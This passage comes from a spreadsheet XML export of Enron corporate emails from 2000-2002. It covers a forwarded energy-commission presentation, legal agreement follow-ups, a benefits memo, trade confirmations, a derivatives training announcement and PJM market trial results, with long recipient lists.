--part6_f8.1691eef9.29957f48_boundary--_x000D_
_x000D_
_x000D_
--part5_f8.1691eef9.299685b2_boundary--_x000D_
_x000D_
_x000D_
--part4_f8.1691eef9.299706b5_boundary--_x000D_
_x000D_
_x000D_
--part3_f8.1691eef9.29982187_boundary--_x000D_
_x000D_
_x000D_
--part2_f8.1691eef9.29985dc3_boundary--_x000D_
_x000D_
_x000D_
_x000D_
------=3D_NextPart_000_3064_3de3_24e8--_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 09:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'steve.walton@enron.com', 'tim.heizenrader@enron.com', 'neil.bresnan@enron.com', 'tim.belden@enron.com', 'mark.fisher@enron.com', 'chris.mallory@enron.com', 'donna.fulton@enron.com', 'robert.badeer@enron.com', 'dave.perrino@enron.com', 'stephen.swain@enron.com', 'don.black@enron.com', 'dennis.benevides@enron.com', 'michael.tribolet@enron.com', 'richard.shapiro@enron.com', 'jeff.richter@enron.com', 'leslie.lawner@enron.com', 'steven.kean@enron.com', 'michael.driscoll@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'harry.kingerski@enron.com', 'bill.iii@enron.com', 'robert.frank@enron.com', 'rebecca.cantrell@enron.com', 'phillip.platter@enron.com', 'diana.scholtes@enron.com', 'chris.foster@enron.com', 'matt.motley@enron.com', 'david.parquet@enron.com', 'sean.crandall@enron.com', 'mark.guzman@enron.com', 'jubran.whalan@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'christopher.calger@enron.com', 'christi.nicolay@enron.com', 'laird.dyer@enron.com', 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>FW: Chairman Keese's presentation on Powerplants and Gas</t>
  </si>
  <si>
    <t>Interesting slide presentation on the state of powerplants, siting and _x000D_
natural gas in CA_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 05/17/2001 01:44 PM -----_x000D_
_x000D_
	"Julia Wright" &lt;jwright@s-k-w.com&gt;_x000D_
	05/17/2001 12:51 PM_x000D_
		 _x000D_
		 To: "Marilyn Hawes" &lt;marilyn@ceert.org&gt;, "Kelly Boyd" _x000D_
&lt;kelly.boyd@asm.ca.gov&gt;, "Karen Edson (E-mail)" &lt;kedson@ns.net&gt;, "Julee _x000D_
Malinowski-Ball (E-mail)" &lt;jmball@ns.net&gt;, "Joseph Alamo" &lt;jalamo@enron.com&gt;, _x000D_
"John White (E-mail)" &lt;vjw@cleanpower.org&gt;, "John Rozsa (E-mail)" _x000D_
&lt;john.rozsa@sen.ca.gov&gt;, "John Redding" &lt;john.redding@gene.ge.com&gt;, "John _x000D_
Larrea (E-mail)" &lt;john.g.larrea@williams.com&gt;, "John Fistolera" _x000D_
&lt;johnf@ncpa.com&gt;, "John Fielder (E-mail)" &lt;moravekj@sce.com&gt;, "John Fielder _x000D_
(E-mail 2)" &lt;fieldejr@sce.com&gt;, "John Bridges (E-mail)" _x000D_
&lt;bridgesj@epenergy.com&gt;, "Joe Ronan" &lt;joer@calpine.com&gt;, "Joe Lyons (E-mail)" _x000D_
&lt;joseph.lyons@asm.ca.gov&gt;, "Jim Groninger (E-mail)" &lt;gronijn@texaco.com&gt;, _x000D_
"Jerry Jordan (E-mail)" &lt;jordan@cmua.org&gt;, "Jeff Dasovich (E-mail)" _x000D_
&lt;jdasovic@enron.com&gt;, "Jeannie Cain (E-mail)" &lt;jeanne.cain@calchamber.com&gt;, _x000D_
"Jan Smutny-Jones (E-mail)" &lt;smutny@iepa.com&gt;, "James D. Boyd (E-mail)" _x000D_
&lt;jim@resources.ca.gov&gt;, "Jack Stewart (E-mail)" &lt;jstewart@cmta.net&gt;, "Jack _x000D_
Gualco" &lt;jackson_gualco@gualcogroup.com&gt;, "Jack Flanigan (E-mail)" _x000D_
&lt;jackflanigan@flaniganlaw.com&gt;, "Greg Hardy (E-mail)" &lt;hardygl@texaco.com&gt;, _x000D_
"Grace Davis" &lt;grace.i.davis@intel.com&gt;, "Gordon McDonald" _x000D_
&lt;gordon.mcdonald@pacificorp.com&gt;, "Gary Schoonyan" &lt;schoongl@sce.com&gt;, "Gary _x000D_
Heath (E-mail)" &lt;gheath@eob.ca.gov&gt;, "Evelyn Elsesser (E-mail)" _x000D_
&lt;eke@aelaw.com&gt;, "Eloy Garcia (E-mail)" &lt;egarcia@ka-pow.com&gt;, "Ed Yates _x000D_
(E-mail)" &lt;ed@clfp.com&gt;, "Doug Fernley" &lt;fernley.doug@epenergy.com&gt;, "Dorothy _x000D_
Rothrock (E-mail)" &lt;drothrock@cmta.net&gt;, "Dominic DiMare" _x000D_
&lt;dominic.dimare@calchamber.com&gt;, "Derek Naten" &lt;derek.naten@roche.com&gt;, _x000D_
"Denny Samuel (E-mail)" &lt;dsam@chevron.com&gt;, "Dennis Price (E-mail)" _x000D_
&lt;priced@epenergy.com&gt;, "Denice Cazalet" &lt;dcazalet@apx.com&gt;, "Delbert Fore _x000D_
(E-mail)" &lt;fore.delbert@epenergy.com&gt;, "Delaney Hunter (E-mail)" _x000D_
&lt;dhunter@smithandkempton.com&gt;, "Dan Carroll (E-mail)" &lt;dcarroll@dbsr.com&gt;, _x000D_
"Craig Brown (E-mail)" &lt;brownc2@epenergy.com&gt;, "Cindy Howell" _x000D_
&lt;chowell@sempra.com&gt;, "Charles Bacchi" &lt;charles.bacchi@asm.ca.gov&gt;, _x000D_
"Catherine Hackney (E-mail)" &lt;hacknece@sce.com&gt;, "Carolyn McIntyre (E-mail)" _x000D_
&lt;cmcintyre@sempra.com&gt;, "Brian Kelly (E-mail)" &lt;brian.kelly@sen.ca.gov&gt;, "Bob _x000D_
Houston (E-mail)" &lt;houstgrp@pacbell.net&gt;, "Bob Foster (E-mail)" _x000D_
&lt;fosterrg@sce.com&gt;, "Bill Keese (E-mail)" &lt;wkeese@energy.state.ca.us&gt;, "Bill _x000D_
Dombrowski (E-mail)" &lt;cra@calretailers.com&gt;, "Bill Booth (E-mail)" _x000D_
&lt;wbooth@booth-law.com&gt;, "Becky Kilbourne (E-mail)" &lt;bakilbourne@calpx.com&gt;, _x000D_
"Barbara Barkovich (E-mail)" &lt;brbarkovich@earthlink.net&gt;, "Audra Hartmann _x000D_
(E-mail)" &lt;ath@cpuc.ca.gov&gt;, "Art Carter (E-mail)" &lt;debinorton@aol.com&gt;, _x000D_
"Anna Ferrera (E-mail)" &lt;anna.ferrera@sen.ca.gov&gt;, "Ann Cohn (E-mail)" _x000D_
&lt;cohnap@sce.com&gt;, "Allan Lippincott (E-mail)" &lt;alippin@mail.arco.com&gt;, "Aaron _x000D_
Thomas (E-mail)" &lt;athomas@newenergy.com&gt;_x000D_
		 cc: "Karen Jarrell (E-mail)" &lt;kjarrell@smurfit.com&gt;, "Karen Koyano" _x000D_
&lt;kykoyano@calpx.com&gt;, "Karen Lindh" &lt;karen@klindh.com&gt;, "Karen Mills _x000D_
(E-mail)" &lt;kmills@cfbf.com&gt;, "Kari Harteloo" &lt;klc@aelaw.com&gt;, "Kassandra _x000D_
Gough (E-mail)" &lt;kgough@calpine.com&gt;, "Kathy Brandenburg" _x000D_
&lt;katherinebrandenburg@flaniganlaw.com&gt;, "Katie Kaplan" &lt;kaplan@iepa.com&gt;, _x000D_
"Kay Grosulak" &lt;kgrosulak@sppc.com&gt;, "Keith McCrea (E-mail)" _x000D_
&lt;kmccrea@sablaw.com&gt;, "Kent G. Smith (E-mail)" &lt;ksmith@energy.state.ca.us&gt;, _x000D_
"Kent Palmerton" &lt;kent.palmerton@williams.com&gt;, "Kevin Lynch (E-mail 2)" _x000D_
&lt;diane.glenn@pacificorp.com&gt;, "Kevin Lynch (E-mail)" _x000D_
&lt;kevin.lynch@pacificorp.com&gt;, "Kevin Smith (E-mail)" &lt;kevins@ncpa.com&gt;, "Kip _x000D_
Lipper (E-mail)" &lt;kip.lipper@sen.ca.gov&gt;, "Lawrence Lingbloom (E-mail)" _x000D_
&lt;lawrence.lingbloom@sen.ca.gov&gt;, "Lenny Goldberg (E-mail)" &lt;lga@mother.com&gt;, _x000D_
"Louis Szablya (E-mail)" &lt;szablyal@epenergy.com&gt;, "Marc Joseph (E-mail)" _x000D_
&lt;mdjoseph@adamsbroadwell.com&gt;, "Mark Smith" &lt;mark_j_smith@fpl.com&gt;, "Marwan _x000D_
Masri (E-mail)" &lt;mmasri@energy.state.ca.us&gt;, "Michael Alcantar (E-mail)" _x000D_
&lt;mpa@aelaw.com&gt;, "Michael Florio (E-mail)" &lt;mflorio@turn.org&gt;, "Mike Kahl _x000D_
(E-mail)" &lt;mikahl@ka-pow.com&gt;, "Mona Petrochko" &lt;mpetroch@enron.com&gt;, "Pete _x000D_
Conaty (E-mail)" &lt;pcaceo@pacbell.net&gt;, "Peter Bray (E-mail)" _x000D_
&lt;pbray@newpower.com&gt;, "Phil Nails (E-mail)" &lt;phil.nails@asm.ca.gov&gt;, "Phil _x000D_
Stohr (E-mail)" &lt;pstohr@dbsr.com&gt;, "Ralph Cavanagh (E-mail)" _x000D_
&lt;rcavanagh@nrdc.org&gt;, "Randy Chinn" &lt;randy.chinn@sen.ca.gov&gt;, "Ray Thompson _x000D_
(E-mail)" &lt;ray.thompson@sen.ca.gov&gt;, "Richard Costigan III ESQ. (E-mail)" _x000D_
&lt;richard.costigan@asm.ca.gov&gt;, "Richard Counihan (E-mail)" _x000D_
&lt;counihan@greenmountain.com&gt;, "Richard Mesereau (E-mail)" _x000D_
&lt;Richard.mesereau@imc.asm.ca.gov&gt;, "Robert Berry" &lt;berry@apx.com&gt;, "Robin _x000D_
Larson (E-mail)" &lt;rlarson@calso.com&gt;, "Scott Tomashefsky (E-mail)" _x000D_
&lt;stomashe@energy.state.ca.us&gt;, "Sheryl Carter (E-mail)" &lt;scarter@nrdc.org&gt;, _x000D_
"Steve Ponder (E-mail)" &lt;steve_ponder@fpl.com&gt;, "Steven M. Pike (E-mail)" _x000D_
&lt;pikes@epenergy.com&gt;, "Stu Wilson (E-mail)" &lt;swilson@cmua.org&gt;, "Sue Mara _x000D_
(E-mail)" &lt;smara@enron.com&gt;, "Susan Reeder" &lt;sreeder@sppc.com&gt;, "Terry Winter _x000D_
(E-mail)" &lt;twinter@calso.com&gt;, "Tim Schmelzer" &lt;tschmelz@energy.state.ca.us&gt;, _x000D_
"Tommy Ross (E-mail)" &lt;rosst@sce.com&gt;, "Tony Braun" &lt;braun@cmua.org&gt;, _x000D_
"Victoria Schaefer" &lt;schaefvl@sce.com&gt;_x000D_
		 Subject: FW: Chairman Keese's presentation_x000D_
_x000D_
_x000D_
The attached presentation is for today's CESG meeting._x000D_
_x000D_
Julia B. Wright_x000D_
Executive Assistant_x000D_
Smith, Kempton &amp; Watts_x000D_
980 Ninth Street, Suite 1560_x000D_
Sacramento, CA 95814_x000D_
(916)446-5508_x000D_
(916)446-1499 Fax_x000D_
jwright@s-k-w.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - CEC Presentation without NOTES.ppt</t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 04:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Citibank N.A./ENA Master Agreement and CSA</t>
  </si>
  <si>
    <t>Molly:  I left you a voice mail this morning about Citibank.  The file _x000D_
reflects that you received correspondence from Citibank on 2/22/00 and Carol _x000D_
St. Clair had propsed revisions to the existing 1/9/96 ISDA Master Agreement _x000D_
(including changes to the CSA).  Have you agreed to those changes?  The _x000D_
Australia office is inquiring about the status of this Master Agreement.  _x000D_
Thanks.  Sara</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 02:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'make_up_pro@yahoo.com'})</t>
  </si>
  <si>
    <t>email project</t>
  </si>
  <si>
    <t>Hey everyone.. something fun to do for the kids._x000D_
This is from my home town so it'd be cool if you help_x000D_
out!   Marsha_x000D_
-------------------_x000D_
Hello! We are in the 2nd grade at McComb Elementary_x000D_
School in Caro, Michigan. We are located in Tuscola_x000D_
County, We have decided, after seeing this done at_x000D_
another school, to map an e-mail project. We are_x000D_
curious to see where in the world our e-mail will_x000D_
travel via the Internet, between the period of_x000D_
February 1, 2001, May 1, 2001, (only 3 months)._x000D_
This is not a pen pal project, so we will not write_x000D_
you back (unless you request it).We would like your_x000D_
help. If you receive this message, we ask that you:_x000D_
_x000D_
1) e-mail back at: kfestian@caro.k12.mi.us_x000D_
&gt; &gt; &gt; and tell us your_x000D_
city/state/location so we can plot it on our map_x000D_
_x000D_
2) Send this letter on to everyone you know so that_x000D_
they can send it on to everyone they know (and so on)_x000D_
to help us reach even more people._x000D_
_x000D_
We're tracking the number of responses we receive by_x000D_
making a graph in our math classes using the numbers_x000D_
received by state._x000D_
With your help, we can make this a very fun and_x000D_
exciting learning experience. PLEASE help us._x000D_
_x000D_
Thank you for any help you can give._x000D_
_x000D_
Your friends,_x000D_
_x000D_
Ben H. McComb Elementary School_x000D_
Mrs. Festian's 2nd Grade_x000D_
303 N. Hooper Street_x000D_
Caro, MI 48723_x000D_
_x000D_
Thanks to the students and teachers of Savannah Grove_x000D_
Elementary School in Effingham, SC for sharing this_x000D_
awesome activity._x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Get personalized email addresses from Yahoo! Mail - only $35_x000D_
a year!  http://personal.mail.yahoo.com/</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 11:07:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jean.adams@enron.com', 'joe.linhart@enron.com', 'e-mail &lt;.larry@enron.com&gt;', 'vernon.mercaldo@enron.com', 'scott.hibbard@enron.com', 'debra.scurlock@enron.com', 'sherry.forbish@enron.com', 'randy.janzen@enron.com', 'janet.mcdaniel@enron.com', 'e-mail &lt;.darrell@enron.com&gt;', 'robert.benningfield@enron.com', 'kathy.sturr@enron.com', 'chris.greaney@enron.com', 'jodie.floyd@enron.com', 'controllers.dl-ets@enron.com', 'e-mail &lt;.lynn@enron.com&gt;', 'harry.woodson@enron.com', 'e-mail &lt;.michael@enron.com&gt;', 'e-mail &lt;.raetta@enron.com&gt;', 'cara.vaughan@enron.com', 'e-mail &lt;.terry@enron.com&gt;', 'e-mail &lt;.john@enron.com&gt;', 'e-mail &lt;.gary@enron.com&gt;', 'linda.trevino@enron.com'})</t>
  </si>
  <si>
    <t>GPM/Duke Dumas Plant - POI 18058</t>
  </si>
  <si>
    <t>This plant will be shutting down effective April 1, 2002.  I will be working with Duke and Gary Spraggins to reduce their OBA imbalance to zero before this date.  Current OBA imbalance is 62,052 dth due Duke._x000D_
_x000D_
Randy Janzen</t>
  </si>
  <si>
    <t>Thu, 26 Jul 2001 08:21:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ann.osire@enron.com', 'e..dickson@enron.com', 'ellen.wallumrod@enron.com'})</t>
  </si>
  <si>
    <t>Amendments</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 FYI,  I have received  Tiger Natural Gas's amendment._x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 10:24:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bill.white@enron.com'})</t>
  </si>
  <si>
    <t>RE: I think the industry is having fun with it!</t>
  </si>
  <si>
    <t xml:space="preserve">aep goes out and celebrates every night.  _x000D_
_x000D_
-----Original Message-----_x000D_
From: White, Bill _x000D_
Sent: Wednesday, November 14, 2001 12:23 PM_x000D_
To: Woulfe, Greg; Arnold, John_x000D_
Subject: FW: I think the industry is having fun with it!_x000D_
_x000D_
_x000D_
The industry loves us!....._x000D_
_x000D_
-----Original Message-----_x000D_
From: Bogucki, Robert _x000D_
Sent: Wednesday, November 14, 2001 12:20 PM_x000D_
To: White, Bill_x000D_
Subject: FW: I think the industry is having fun with it!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 08:33:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'will.smith@enron.com', 'steve.stock@enron.com', 'hilburn.henry@enron.com', 'laura.dewett@enron.com', 'matt.pena@enron.com', 'ganapathy.ramesh@enron.com', 'legal &lt;.hall@enron.com&gt;', 'felicia.ma@enron.com', 'genia.fitzgerald@enron.com', 'bob.hillier@enron.com', 'john.postlethwaite@enron.com', 'paul.lewis@enron.com', 'jeffrey.miller@enron.com', 'bhupesh.nagar@enron.com', 'l..day@enron.com', 'michael.belmont@enron.com', 'ajay.sindwani@enron.com', 'franky.sulistio@enron.com', 'mable.tang@enron.com', 'michael.robertson@enron.com', 'vijay.gadhavi@enron.com', 'john.anderson@enron.com', 'jim.cashion@enron.com', 'seung-taek.oh@enron.com', 'andrew.champion@enron.com', 'scott.newkirk@enron.com', 'rennu.varghese@enron.com', 'janette.elbertson@enron.com', 'krishna.lattupally@enron.com', 'chris.bowling@enron.com', 'phil.motuzko@enron.com', 'benedicta.tung@enron.com', 'chris.schomer@enron.com', 'joe.errigo@enron.com', 'bala.kandaswamy@enron.com', 'scotty.gilbert@enron.com', 'craig.dean@enron.com', 'jay.webb@enron.com', 'nayan.dattani@enron.com', 'piyush.patel@enron.com', 'sally.beck@enron.com', 'marcus.nettelton@enron.com', 'moyez.lallani@enron.com', 'jayanta.sengupta@enron.com', 'heather.dunton@enron.com', 'stacey.ramsay@enron.com', 'ramesh.rao@enron.com', 'steve.nat@enron.com', 'donna.sheidun@enron.com', 'marci.mansfield@enron.com', 'eugene.lee@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'louise.kitchen@enron.com', 'cecilia.cheung@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'min.zheng@enron.com', 'suvinay.sinha@enron.com', 'fran.chang@enron.com', 'brad.merrell@enron.com', 'robert.laurel@enron.com', 'sonia.hennessy@enron.com', 'christine.dinh@enron.com', 'raghu.burra@enron.com', 'david.dronet@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'c..koehler@enron.com', 'victoria.sorkina@enron.com', 'jeff.dasovich@enron.com', 'david.portz@enron.com', 'hien.trinh@enron.com', 'hal.mckinney@enron.com', 'michael.swaim@enron.com', 'mark.kinkead@enron.com', 'duong.luu@enron.com', 'norman.lee@enron.com', 'clement.charbonnet@enron.com', 'alan.comnes@enron.com', 'patrick.hanse@enron.com', 'pinto.leite@enron.com', 'christian.yoder@enron.com', 'ajit.dhansinghani@enron.com', 'w..bennett@enron.com', 'ron.nolte@enron.com', 'a..allen@enron.com', 'bill.fortney@enron.com', 'michael.berger@enron.com', 'corry.bentley@enron.com', 'robert.virnau@enron.com', 'cynthia.clark@enron.com', 'andrea.dahlke@enron.com', 'virendra.patel@enron.com', 'patrick.davis@enron.com', 'm..smith@enron.com', 's..lim@enron.com', 'juan.padron@enron.com', 'tantra.invedy@enron.com', 'shawn.macphail@enron.com', 'todd.walker@enron.com', 'mai.nguyen@enron.com', 'frank.hayden@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'e..haedicke@enron.com', 'angela.davis@enron.com', 'andrew.hawthorn@enron.com', 'sundar.chitradurga@enron.com', 'm..docwra@enron.com', 'kim.durham@enron.com', 'sivakumar.govindasamy@enron.com', 'albert.meyers@enron.com', 'jim.sugrue@enron.com', 'narasim.kasaru@enron.com', 'lori.boudreaux@enron.com', 'ben.nguyen@enron.com', 'l..garcia@enron.com', 'diane.cutsforth@enron.com', 'michael.mier@enron.com', 'george.wang@enron.com', 'sean.yang@enron.com', 'kelley.huntley@enron.com', 'd..powell@enron.com', 'tony.thomas@enron.com', 'michael.ritacco@enron.com', 'jatinder.dua@enron.com', 'charles.brewer@enron.com', 'michelle.cash@enron.com', 'bryce.schneider@enron.com', 'michael.seely@enron.com', 'genady.batrak@enron.com', 'samuel.blaylock@enron.com', 'jim.meyer@enron.com', 'holden.salisbury@enron.com', 'jaikishore.bharathi@enron.com', 't..hodge@enron.com', 'jayant.krishnaswamy@enron.com', 'jason.stephens@enron.com', 'dan.harrell@enron.com', 'w..white@enron.com', 'jeremy.wong@enron.com', 'david.poston@enron.com', 'ryan.slinger@enron.com', 'ricky.dang@enron.com', 'kenneth.lim@enron.com', 'zhuoming.lou@enron.com', 'd..steffes@enron.com', 'jonathan.ryan@enron.com', 'jessie.wang@enron.com', 'bill.williams@enron.com', 'george.ji@enron.com', 'zhiyong.wei@enron.com', 'suzanne.calcagno@enron.com', 'peter.makkai@enron.com', 'marc.bir@enron.com', 'terris.kyle-watson@enron.com', 'alan.chen@enron.com', 'wayne.vinson@enron.com', 'geir.solberg@enron.com', 'matt.burleigh@enron.com', 'debra.bailey@enron.com', 'marie.heard@enron.com', 'dwayne.peterson@enron.com', 'sudheer.kannantha@enron.com', 'tana.jones@enron.com', 'mark.symms@enron.com', 'tianri.zhu@enron.com', 'leslie.reeves@enron.com', 'anwar.melethil@enron.com'})</t>
  </si>
  <si>
    <t>Final Benefits Memo</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
In order for UBS Warburg to timely process your paycheck, I am requesting that all employee's accepting offers return any outstanding forms to my new desk location at  05852 on the 5th floor of ECS (Look for the Hamburg Flag) by noon this Friday  2/01/02.  This will prevent any benefit deductions from having to be "Double Deducted" on future checks.  Please attach a deposit slip or voided check stub to your direct deposit form.  Attached below are the forms needed for payroll/benefits, in case you did not turn these in at Orientation.  Lastly, please verify that your EHRonline home address is showing your current home address because all live checks will be mailed to your home residence. _x000D_
_x000D_
    _x000D_
_x000D_
Thanks, Tony Jarrett_x000D_
Benefits_x000D_
Ext. 3- 7829 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 07:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Can you check Mike Swerzbin for the following deals through Prebon:_x000D_
_x000D_
Enron sells Sempra 50 mw of Sept.'01  Mid-C at $360.00_x000D_
Enron buys Sempra 50 mw of July '01 Mid-C at $270.00_x000D_
_x000D_
Thanks!!</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 07:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kent.miller@enron.com', 'martha.janousek@enron.com', 'lee.huber@enron.com', 'pinnamaneni.krishnarao@enron.com', 'dave.neubauer@enron.com', 'sean.bolks@enron.com', 'steve.gilbert@enron.com', 'vernon.mercaldo@enron.com', 'lee.ferrell@enron.com', 'jim.wiltfong@enron.com', 'sek6@cornell.edu', 'steven.harris@enron.com', 'lindy.donoho@enron.com', 'jo.williams@enron.com', 'youyi.feng@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Revenue Management Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Please plan to attend a Revenue Management Science Kick-off Meeting on _x000D_
Wednesday, August 23, from 10:30 - 5:00 p.m. located in the Enron Building _x000D_
conference room 49C1.  The purpose of this meeting will be to identify and _x000D_
prioritize our forecasting and optimization efforts for Revenue Management. _x000D_
Your  attendance in Houston for this meeting is critical.  We will send out _x000D_
an agenda prior to the meeting.  Please call  Kim Watson at 713-853-3098, by _x000D_
Friday, August 18,  if you are unable to attend.  Lunch will be provided._x000D_
_x000D_
_x000D_
We look forward to seeing you there._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 08:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>UPDATE - Bloomberg</t>
  </si>
  <si>
    <t>Mark spoke to Bloomberg and their attorney with Wilkie Farr, and they made _x000D_
substantial revisions to the form.  I just faxed a clean and blacklined draft _x000D_
to them and am waiting to get their approval.  Will you be around to sign?</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 01:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bwallace@tcast.com'})</t>
  </si>
  <si>
    <t>Kristi said you called on Saturday.  I was golfing.  What did you think about _x000D_
the draft?  I thought LD was a good college player, but not great.  Everyone _x000D_
seems to think he will be an All-Pro type player before he's done.  As long _x000D_
as he works hard, I think SR would make the best Pro.  But what do I know?_x000D_
_x000D_
DG</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 04:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Derivatives I Training Course - June 4th and 5th</t>
  </si>
  <si>
    <t xml:space="preserve">We will be offering Derivatives I training on-site.  If you are interested in _x000D_
attending, please let Amy FitzPatrick know no later than May 21st._x000D_
_x000D_
Derivatives I - Applied Energy Derivatives_x000D_
Presented by Paradigm Strategy Group_x000D_
_x000D_
Date:    Monday, June 4th and Tuesday, June 5th_x000D_
Time:  8:00 am to 5:00 pm_x000D_
_x000D_
This course is appropriate for all employees wishing to obtain a practical _x000D_
understanding of the basic natural gas and power derivative structures that _x000D_
are traded and marketed today.  An emphasis is placed on understanding how _x000D_
financial tools are added to physical structures to meet the risk management _x000D_
needs of clients._x000D_
_x000D_
Participants attending this seminar will be able to:_x000D_
_x000D_
Formulate customer hedge strategies based on a solid understanding of risk; _x000D_
its impact on capital structures and approaches to its mitigation._x000D_
Develop and interpret forward prices in the context of arbitration _x000D_
disciplines, as well as understand the divergences from these disciplines _x000D_
that are characteristic of energy prices._x000D_
Identify marketing opportunities through an understanding of both the forward _x000D_
curve and the distortions created by the physical system of production and _x000D_
transportation._x000D_
Assemble the pricing of a transaction from a benchmark price curve._x000D_
Devise cost-reducing deal structures for gas storage from an understanding of _x000D_
price curves and their components._x000D_
Exploit differences in locational pricing with insights into the relationship _x000D_
between basis and transportation/transmission._x000D_
Structure a natural gas and power swap to hedge a company's risk position, _x000D_
explaining its risks and benefits as a risk management tool._x000D_
Price a swap from the price curve and customize the structure to meet various _x000D_
customer needs including earnings, cash flow and embedded financing. _x000D_
Apply basis swaps to either mitigate locational risk or to achieve a more _x000D_
favorable risk/reward position by altering the index location._x000D_
Attain a fluency in language concepts and hedging application of options._x000D_
Package strips of options to create caps, floors and zero-premium collars._x000D_
Create structures that provide energy users with sub-index pricing using _x000D_
embedded options._x000D_
Recognize options embedded in common supply contracts and their pricing _x000D_
implications, including swing, double-ups and index contracts with maximum _x000D_
prices, etc._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 10:21:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', '/o=enron/ou=na/cn=recipients/cn=notesaddr/cn=7c68593d-8f87e08a-86256a42-713075@enron.com', 'rogers.herndon@enron.com', 'mark.bernstein@enron.com', 'j..broderick@enron.com', 'dana.davis@enron.com', 'cory.willis@enron.com', 'gautam.gupta@enron.com', 'jeffrey.miller@enron.com', 'joe.stepenovitch@enron.com', 'sarah.novosel@enron.com', 'jeff.ader@enron.com', 'don.black@enron.com', 'c..aucoin@enron.com', 'f..campbell@enron.com', 'narsimha.misra@enron.com', 'd..thomas@enron.com', 'gerald.gilbert@enron.com', 'l..nicolay@enron.com', 'tom.dutta@enron.com', 'tom.may@enron.com', 'susan.lindberg@enron.com', 'm..presto@enron.com', 'w..hammond@enron.com', 'robert.stalford@enron.com', 'robert.benson@enron.com'})</t>
  </si>
  <si>
    <t>FW: pjm-emc FW: PJM West Day Ahead Market Trials - Results</t>
  </si>
  <si>
    <t>See below for PJM West market trial results._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	owner-pjm-emc@pjm.com@ENRON &lt;mailto:owner-pjm-emc@pjm.com@ENRON&gt;   On Behalf Of filipov@pjm.com &lt;mailto:filipov@pjm.com&gt;_x000D_
Sent:	Thursday, November 29, 2001 10:33 AM_x000D_
To:	pjm-emc@pjm.com &lt;mailto:pjm-emc@pjm.com&gt;_x000D_
Subject:	pjm-emc FW: PJM West Day Ahead Market Trials - Results_x000D_
_x000D_
The following message has been posted to the PJM Energy Market Committee_x000D_
Mailing List (pjm-emc):_x000D_
_x000D_
Dear Members,_x000D_
_x000D_
&gt; Thank you all for participating in the day ahead PJM West Market Trials._x000D_
&gt;_x000D_
&gt; The Day Ahead Market results for each of the trial days are available in CSV_x000D_
&gt; file format on the PJM Website.  To view and download these files, please go_x000D_
&gt; to &lt;http://www.pjm.com/custinfo/west/pjm_west.htm&gt;._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Lynn Marie Horning_x000D_
&gt; Market Development Dept_x000D_
&gt; PJM Interconnection, L.L.C._x000D_
&gt; horning@pjm.com &lt;mailto:horning@pjm.com&gt;_x000D_
&gt; Direct:	610-666-4714_x000D_
&gt; Fax:	610-666-4282_x000D_
&gt;_x000D_
_x000D_
Opinions expressed in this e-mail are those of the originating sender, not_x000D_
those of the PJM Interconnection, L.L.C._x000D_
_x000D_
To unsubscribe from this list, send an e-mail to majordomo@majordomo.pjm.com &lt;mailto:majordomo@majordomo.pjm.com&gt;_x000D_
containing only the following line in the body of the e-mail:_x000D_
_x000D_
     unsubscribe pjm-emc</t>
  </si>
  <si>
    <t>Fri, 23 Feb 2001 05:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Deal No. 529589</t>
  </si>
  <si>
    <t xml:space="preserve">Go for it!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
02/23/2001 01:16 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Deal No. 529589_x000D_
_x000D_
